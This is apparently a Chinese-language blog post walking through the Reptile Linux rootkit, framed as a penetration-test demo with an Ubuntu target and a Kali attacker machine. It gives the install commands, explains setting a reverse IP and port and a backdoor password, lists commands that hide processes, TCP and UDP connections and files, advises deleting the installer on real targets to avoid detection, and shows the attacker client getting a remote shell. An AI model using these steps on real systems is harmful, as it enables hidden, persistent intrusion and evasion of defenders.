Reptile Linux rootkit

## 项目地址

https://github.com/f0rb1dd3n/Reptile

## 安装

apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install

## 卸载

./setup.sh remove

这里来说明一下,安装和卸载都是在渗透目标机器上进行的,需要交互式 shell。下面我以 ubuntu 作为渗透测试目标 kali 作为攻击机器来演示一下如何使用。

### on vulnerable ubuntu(192.168.5.148)

和 msf 生成木马比较类似 Reverse IP 是 kali 的 ip,Reverse Port 是 反弹到 kali 的端口,SRC port 是本地接收数据包的端口 Backdoor password 是我们后门的密码。最后提示是否删除这个项目,实战下肯定是要删除的,因为这个客户端和服务端安装都是一个 setup.sh 被发现会被卸载掉,这里我自己的机器就不删了。

看下 rootkit 效果,没有进程,没有连接。

隐藏进程: /reptile/reptile_cmd hide <pid> 
显示进程: /reptile/reptile_cmd show <pid>
隐藏udp: /reptile/reptile_cmd udp <IP> <port> hide 
显示udp: /reptile/reptile_cmd udp <IP> <port> show
隐藏tcp: /reptile/reptile_cmd tcp <IP> <port> hide 
显示tcp: /reptile/reptile_cmd tcp <IP> <port> show
还可以隐藏文件 所有包含 reptile 这个字符的文件会被隐藏,这个字符可以在配置文件中修改。

### on attacker kali(192.168.5.149)

## 安装控制端

./setup.sh client

安装好以后配置相关参数

这是候已经连接上了,可以看到可以上传下载和获得一个 shell

posted @ 2020-01-20 10:46  爱吃蚊子爱子钰  阅读(2053)  评论(2编辑  收藏  举报